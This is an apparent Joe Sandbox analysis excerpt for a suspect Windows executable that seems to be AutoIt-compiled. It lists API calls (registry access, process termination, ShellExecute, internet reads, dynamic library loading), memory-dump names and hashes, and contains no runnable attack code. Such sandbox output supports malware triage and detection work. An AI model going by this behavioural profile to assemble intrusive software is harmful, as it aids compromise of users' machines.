                                              • LineTo.GDI32(?,00000000,00000003), ref: 00E08A80
                                              • EndPath.GDI32(?), ref: 00E08A90
                                              • StrokePath.GDI32(?), ref: 00E08AA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                              • String ID:
                                              • API String ID: 43455801-0
                                              • Opcode ID: 1abf4a3ae93d861ae98f5b50ac410724104fd565dcc933082f584a7eaa1c6228
                                              • Instruction ID: 9c4d8eec43065f7a8ce98f2d6a2648a83b4af5bc9ade09cfd93ec4f2578f3364
                                              • Opcode Fuzzy Hash: 1abf4a3ae93d861ae98f5b50ac410724104fd565dcc933082f584a7eaa1c6228
                                              • Instruction Fuzzy Hash: D9111E7600010CFFEF119F91DC88EAA7F6CEB04354F148151FA55A51A1C7729D99DFA0
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00DD5218
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DD5229
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DD5230
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00DD5238
                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00DD524F
                                              • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00DD5261
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: 1a87ba0ff53b8da450aad48413652aca3019e492f06953e2edd3c76a9267a471
                                              • Instruction ID: 3517deeef6230c18a46590281504070c4c9bba0e9b6cc51d3890489ea5a1d6fd
                                              • Opcode Fuzzy Hash: 1a87ba0ff53b8da450aad48413652aca3019e492f06953e2edd3c76a9267a471
                                              • Instruction Fuzzy Hash: D2018F75A00708BFEB109BA69C49F4EBFB8EF48751F144166FA04A7280D6719808CBA0
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D71BF4
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D71BFC
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D71C07
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D71C12
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D71C1A
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D71C22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
                                              • Opcode ID: fb948e3bd4dc8f7882a06467569511019070196d3e4cbbad260537aa08c0e2b8
                                              • Instruction ID: 186161fa0bf59cbeb20d03ec47713659ff6616aa66dd90ab51f131fefe9f299a
                                              • Opcode Fuzzy Hash: fb948e3bd4dc8f7882a06467569511019070196d3e4cbbad260537aa08c0e2b8
                                              • Instruction Fuzzy Hash: 59016CB09027597DE3008F5A8C85B52FFA8FF19754F00411B915C47941C7F5A864CBE5
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DDEB30
                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DDEB46
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00DDEB55
                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEB64
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEB6E
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEB75
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                              • String ID:
                                              • API String ID: 839392675-0
                                              • Opcode ID: 7eb2769985f4043e936c5117babcea73793d9920d0bd15b98025feb82d47b03c
                                              • Instruction ID: 3cee9620a07ceb2fef3751669f8490ef253221d04e69b85e71d5dc9f3b712c88
                                              • Opcode Fuzzy Hash: 7eb2769985f4043e936c5117babcea73793d9920d0bd15b98025feb82d47b03c
                                              • Instruction Fuzzy Hash: EBF09072101118BFE7205753AC0DEEF3A7CEFCAF11F100259F601E1090D7A21A45C6B5
                                              APIs
                                              • GetClientRect.USER32(?), ref: 00DC7452
                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00DC7469
                                              • GetWindowDC.USER32(?), ref: 00DC7475
                                              • GetPixel.GDI32(00000000,?,?), ref: 00DC7484
                                              • ReleaseDC.USER32(?,00000000), ref: 00DC7496
                                              • GetSysColor.USER32(00000005), ref: 00DC74B0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                              • String ID:
                                              • API String ID: 272304278-0
                                              • Opcode ID: 753c22d569e09460e6b6ed313af7b1ec4d95c3f9289827ab6d534356acd23f22
                                              • Instruction ID: 1071e7ffdf4ca93f42cc9d72e1567813b5b7215f60f3cb813f6fe3bfb58d6f46
                                              • Opcode Fuzzy Hash: 753c22d569e09460e6b6ed313af7b1ec4d95c3f9289827ab6d534356acd23f22
                                              • Instruction Fuzzy Hash: 23018B31404206EFDB205F65EC08FAA7BB5FB04321F250264FA15A30A0CB321E86AF61
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00D7BEB3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: D%$D%$D%$D%
                                              • API String ID: 1385522511-2722557190
                                              • Opcode ID: 9141dd1d4296ee5e326fdfae4ad77718c52941767188e14ca1efd14b98042395
                                              • Instruction ID: a14c82fc0ba12f8e9d3ac12dd16b38748534f72415085457df4ef0dfb3bc716a
                                              • Opcode Fuzzy Hash: 9141dd1d4296ee5e326fdfae4ad77718c52941767188e14ca1efd14b98042395
                                              • Instruction Fuzzy Hash: F8912D75A00206DFCB14CF69C0916A9B7F1FF59324F64C15EE989AB351E731E981CBA0
                                              APIs
                                                • Part of subcall function 00D77620: _wcslen.LIBCMT ref: 00D77625
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DDC6EE
                                              • _wcslen.LIBCMT ref: 00DDC735
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DDC79C
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DDC7CA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info_wcslen$Default
                                              • String ID: 0
                                              • API String ID: 1227352736-4108050209
                                              • Opcode ID: 26ca4bbb5e410d2b798852974cfed8e45321c7f29860298351650ca876130825
                                              • Instruction ID: 30d0f4abd4db1180764fbcd75b66ba29fd7c9967efae66db35f0b9709d205825
                                              • Opcode Fuzzy Hash: 26ca4bbb5e410d2b798852974cfed8e45321c7f29860298351650ca876130825
                                              • Instruction Fuzzy Hash: 4251B371624302ABD7159F28C845B6B77E4EF85314F082A2EF595E32E0EB70D948DB72
                                              APIs
                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00DFAEA3
                                                • Part of subcall function 00D77620: _wcslen.LIBCMT ref: 00D77625
                                              • GetProcessId.KERNEL32(00000000), ref: 00DFAF38
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFAF67
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseExecuteHandleProcessShell_wcslen
                                              • String ID: <$@
                                              • API String ID: 146682121-1426351568
                                              • Opcode ID: 0b3331df716db06d91753014c9ab6ee870213a75aff9271897f5d120bc2b9e0a
                                              • Instruction ID: a50873a4f72bde8ac65ec4a5ea5f174922bc1a366609827d9baf573611b64d35
                                              • Opcode Fuzzy Hash: 0b3331df716db06d91753014c9ab6ee870213a75aff9271897f5d120bc2b9e0a
                                              • Instruction Fuzzy Hash: 357158B1A00219DFCB14DF58C484AAEBBF0EF08310F15C499E95AAB352D774ED45CBA1
                                              APIs
                                              • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00DD7206
                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00DD723C
                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00DD724D
                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DD72CF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                              • String ID: DllGetClassObject
                                              • API String ID: 753597075-1075368562
                                              • Opcode ID: d196e76f56c9c5e7f797610cd29806308f15df78b733504c1fa0307e33ef0697
                                              • Instruction ID: f25833b209aada6dc170737c7b385ee65b4e0fcf5064c90542c2c161241c7863
                                              • Opcode Fuzzy Hash: d196e76f56c9c5e7f797610cd29806308f15df78b733504c1fa0307e33ef0697
                                              • Instruction Fuzzy Hash: D9416A71A05204AFDB25CF54C885A9A7FB9EF44310F2480AEBD05AF30AE7B1D944CBB4
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: HKEY_LOCAL_MACHINE$HKLM
                                              • API String ID: 176396367-4004644295
                                              • Opcode ID: a6a02ba32ad013ee4f86b0a1d9698948a62fbfcddaf868e1351ac97a1049f8e9
                                              • Instruction ID: 9bd94ecdf1234ac4e265a2601e59eafab48476a4fd226180a08c8227f3b893a2
                                              • Opcode Fuzzy Hash: a6a02ba32ad013ee4f86b0a1d9698948a62fbfcddaf868e1351ac97a1049f8e9
                                              • Instruction Fuzzy Hash: 06314573A2016D4ACB20DF2C8A514BE37919BA1750F0FE029E945AB245FA70ED60C3B0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E02F8D
                                              • LoadLibraryW.KERNEL32(?), ref: 00E02F94
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E02FA9
                                              • DestroyWindow.USER32(?), ref: 00E02FB1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                              • String ID: SysAnimate32
                                              • API String ID: 3529120543-1011021900
                                              • Opcode ID: 67aaba7a6c0e32742f4fbc6e2ebf654683bfb4ae41df8835a567c4b75d79cbfd
                                              • Instruction ID: 20bea19e2cca3213fefeec46948e7e6c4b2ee6fbbc30d4d86de5a49f07472b1f
                                              • Opcode Fuzzy Hash: 67aaba7a6c0e32742f4fbc6e2ebf654683bfb4ae41df8835a567c4b75d79cbfd
                                              • Instruction Fuzzy Hash: 9B218E71200206AFEB215F649C48EBB77F9EB593A8F20621CFA50B21D0D672DC919760
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D94D1E,00DA28E9,?,00D94CBE,00DA28E9,00E388B8,0000000C,00D94E15,00DA28E9,00000002), ref: 00D94D8D
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D94DA0
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00D94D1E,00DA28E9,?,00D94CBE,00DA28E9,00E388B8,0000000C,00D94E15,00DA28E9,00000002,00000000), ref: 00D94DC3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: b068522b144e6cb2e3d93aedeb0cee8829a65826195a632cf6b6e3650548a947
                                              • Instruction ID: 338b402517130e5273bff0464b7ce4f186cd48ebdd3b3367c16ac38fc52246ee
                                              • Opcode Fuzzy Hash: b068522b144e6cb2e3d93aedeb0cee8829a65826195a632cf6b6e3650548a947
                                              • Instruction Fuzzy Hash: BDF0AF34A00208BFDB119F91DC09BEDBFB4EF04712F1401A4F809B22A0DB719985CBA1
                                              APIs
                                              • LoadLibraryA.KERNEL32 ref: 00DCD3AD
                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DCD3BF
                                              • FreeLibrary.KERNEL32(00000000), ref: 00DCD3E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: GetSystemWow64DirectoryW$X64
                                              • API String ID: 145871493-2590602151
                                              • Opcode ID: 836ae5a81872a861f97698a6af04f02231ba558da9f069b4ad1c74810e4b9ce0
                                              • Instruction ID: 1f9c767d5c14feffb56f758e1082c22435b68b54cdd9241ffc513447b42b88c9
                                              • Opcode Fuzzy Hash: 836ae5a81872a861f97698a6af04f02231ba558da9f069b4ad1c74810e4b9ce0
                                              • Instruction Fuzzy Hash: EDF020308026239BCB312B118C18F2AB222AF50B01F79927DE446F3080DB30CC8486F7
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D74EDD,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E9C
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D74EAE
                                              • FreeLibrary.KERNEL32(00000000,?,?,00D74EDD,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74EC0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 145871493-3689287502
                                              • Opcode ID: 8ecf16a3c2aed7e2b0adc34dadfd7fc0a17d69e6d497923f4cff37255492768a
                                              • Instruction ID: 488e4abf6c036ddbc1d096ff4caeb2d6f814e067206ca71a43794f2bde2c1d96
                                              • Opcode Fuzzy Hash: 8ecf16a3c2aed7e2b0adc34dadfd7fc0a17d69e6d497923f4cff37255492768a
                                              • Instruction Fuzzy Hash: 5FE08636A026225FD22217266C18A6B6564AF81B72B194215FC04F2140EB64CD4585B1
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DB3CDE,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E62
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D74E74
                                              • FreeLibrary.KERNEL32(00000000,?,?,00DB3CDE,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E87
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 145871493-1355242751
                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 00DFA427
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DFA435
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DFA468
                                              • CloseHandle.KERNEL32(?), ref: 00DFA63D
                                               Similarity
                                               • API ID: Process$CloseCountersCurrentHandleOpen
                                               • String ID:
                                               • API String ID: 3488606520-0
                                              APIs
                                                • Part of subcall function 00DDDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DDCF22,?), ref: 00DDDDFD
                                                • Part of subcall function 00DDDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DDCF22,?), ref: 00DDDE16
                                                • Part of subcall function 00DDE199: GetFileAttributesW.KERNEL32(?,00DDCF95), ref: 00DDE19A
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00DDE473
                                              • MoveFileW.KERNEL32(?,?), ref: 00DDE4AC
                                              • _wcslen.LIBCMT ref: 00DDE5EB
                                              • _wcslen.LIBCMT ref: 00DDE603
                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00DDE650
                                               Similarity
                                               • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                               • String ID:
                                               • API String ID: 3183298772-0
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DFC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB6AE,?,?), ref: 00DFC9B5
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFC9F1
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA68
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA9E
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFBAA5
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFBB00
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DFBB63
                                              • RegCloseKey.ADVAPI32(?,?), ref: 00DFBBA6
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DFBBB3
                                               Similarity
                                               • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                               • String ID:
                                               • API String ID: 826366716-0
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00DD8BCD
                                              • VariantClear.OLEAUT32 ref: 00DD8C3E
                                              • VariantClear.OLEAUT32 ref: 00DD8C9D
                                              • VariantClear.OLEAUT32(?), ref: 00DD8D10
                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DD8D3B
                                               Similarity
                                               • API ID: Variant$Clear$ChangeInitType
                                               • String ID:
                                               • API String ID: 4136290138-0
                                              APIs
                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DE8BAE
                                              • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00DE8BDA
                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DE8C32
                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DE8C57
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DE8C5F
                                               Similarity
                                               • API ID: PrivateProfile$SectionWrite$String
                                               • String ID:
                                               • API String ID: 2832842796-0
                                              APIs
                                              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00DF8F40
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00DF8FD0
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DF8FEC
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00DF9032
                                              • FreeLibrary.KERNEL32(00000000), ref: 00DF9052
                                                • Part of subcall function 00D8F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00DE1043,?,753CE610), ref: 00D8F6E6
                                                • Part of subcall function 00D8F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00DCFA64,00000000,00000000,?,?,00DE1043,?,753CE610,?,00DCFA64), ref: 00D8F70D
                                               Similarity
                                               • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                               • String ID:
                                               • API String ID: 666041331-0
                                              APIs
                                              • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00E06C33
                                              • SetWindowLongW.USER32(?,000000EC,?), ref: 00E06C4A
                                              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00E06C73
                                              • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00DEAB79,00000000,00000000), ref: 00E06C98
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00E06CC7
                                               Similarity
                                               • API ID: Window$Long$MessageSendShow
                                               • String ID:
                                               • API String ID: 3688381893-0
                                              APIs
                                               Similarity
                                               • API ID: _free
                                               • String ID:
                                               • API String ID: 269201875-0
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00D89141
                                              • ScreenToClient.USER32(00000000,?), ref: 00D8915E
                                              • GetAsyncKeyState.USER32(00000001), ref: 00D89183
                                              • GetAsyncKeyState.USER32(00000002), ref: 00D8919D
                                               Similarity
                                               • API ID: AsyncState$ClientCursorScreen
                                               • String ID:
                                               • API String ID: 4210589936-0
                                              APIs
                                              • GetInputState.USER32 ref: 00DE38CB
                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DE3922
                                              • TranslateMessage.USER32(?), ref: 00DE394B
                                              • DispatchMessageW.USER32(?), ref: 00DE3955
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE3966
                                               Similarity
                                               • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                               • String ID:
                                               • API String ID: 2256411358-0
                                              APIs
                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00DEC21E,00000000), ref: 00DECF38
                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00DECF6F
                                              • GetLastError.KERNEL32(?,00000000,?,?,?,00DEC21E,00000000), ref: 00DECFB4
                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DEC21E,00000000), ref: 00DECFC8
                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DEC21E,00000000), ref: 00DECFF2
                                              Similarity
                                              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                              • String ID:
                                              • API String ID: 3191363074-0
                                              • Opcode ID: 72e9a67defac5b006e4ac1e5516ec192f02aa178dadc1fd3aab372a2e87706ed
                                              • Instruction ID: 3adc5fd8e1c5620ce1e5b6bd2c608e7a4546e84a5122e6b53c0fcda07daf4f9f
                                              • Opcode Fuzzy Hash: 72e9a67defac5b006e4ac1e5516ec192f02aa178dadc1fd3aab372a2e87706ed
                                              • Instruction Fuzzy Hash: 7C317C71615645EFDB20EFA6C884AABBBF9EF04315B24442EF546E2110DB30EE469B70
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00DD1915
                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 00DD19C1
                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00DD19C9
                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00DD19DA
                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00DD19E2
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              • Opcode ID: 5a58f896a117b2b0e1c6400d70985469bb0a8f5c694f1718a4615a36f51dba62
                                              • Instruction ID: 10d01df5e9b39fca8e8eac3ed05f6140c501912faf25253cb3aca042eaf37054
                                              • Opcode Fuzzy Hash: 5a58f896a117b2b0e1c6400d70985469bb0a8f5c694f1718a4615a36f51dba62
                                              • Instruction Fuzzy Hash: 3131AD75A00219EFCB10CFA8D9A9ADE3BB5EB04315F14432AF961A72D1C770A944CFA1
                                              APIs
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E05745
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E0579D
                                              • _wcslen.LIBCMT ref: 00E057AF
                                              • _wcslen.LIBCMT ref: 00E057BA
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E05816
                                              Similarity
                                              • API ID: MessageSend$_wcslen
                                              • String ID:
                                              • API String ID: 763830540-0
